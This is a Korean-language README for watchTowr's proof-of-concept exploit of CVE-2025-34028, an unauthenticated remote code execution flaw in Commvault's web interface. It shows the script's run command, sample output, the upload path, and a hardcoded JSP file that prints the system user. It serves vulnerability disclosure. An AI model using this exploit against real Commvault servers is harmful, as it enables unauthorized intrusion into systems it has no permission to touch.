
CVE-2025-34028에 대한 개념 증명 익스플로잇, 악성 JSP 업로드를 통해 Commvault 웹 인터페이스에서 사전 인증된 원격 코드 실행을 보여줍니다.
Commvault 사전 인증 원격 코드 실행 개념 증명
블로그 포스트에서 기술적 세부 사항을 확인하세요.
python watchtowr-vs-commvault-rce-CVE-2025-34028.py --url https://192.168.1.1
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchtowr-vs-commvault-rce-CVE-2025-34028.py
(*) Commvault Unauthenticated Remote Code Execution (CVE-2025-34028) POC by watchTowr
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2025-34028]
[*] Targeting https://192.168.1.1
[*] Verifying presence of Commvault
[*] Uploading to /reports/MetricsUpload/2GfMIJdK/
[*] Fetching System User from https://192.168.1.1/reports/MetricsUpload/2GfMIJdK/.tmp/dist-cc/dist-cc/shell.jsp
[*] System User EC2XXX-XXXXXXX$
이 스크립트는 Commvault 웹 인터페이스를 위한 CVE-2025-34028의 개념 증명입니다. 코드 실행 .jsp 파일이 포함된 zip 파일을 업로드하면, 해당 zip 파일이 공개 디렉터리에 업로드되고 응답 내에서 시스템 사용자 정보가 제공됩니다. 더 자세한 내용은 [블로그 포스트] (https://labs.watchtowr.com/)에 설명되어 있습니다.
PoC 스크립트는 다음 파일이 포함된 하드코딩된 zip 파일을 사용합니다:
Shell.jsp 내용:
<%@ page import="java.util.*" %>
<html>
<body>
<h3>System Information</h3>
<p>Current User: <%= System.getProperty("user.name") %></p>
</body>
</html>
자세한 내용은 Commvault 보안 권고를 참조하세요.
최신 보안 연구를 위해 watchTowr 연구소 팀을 팔로우하세요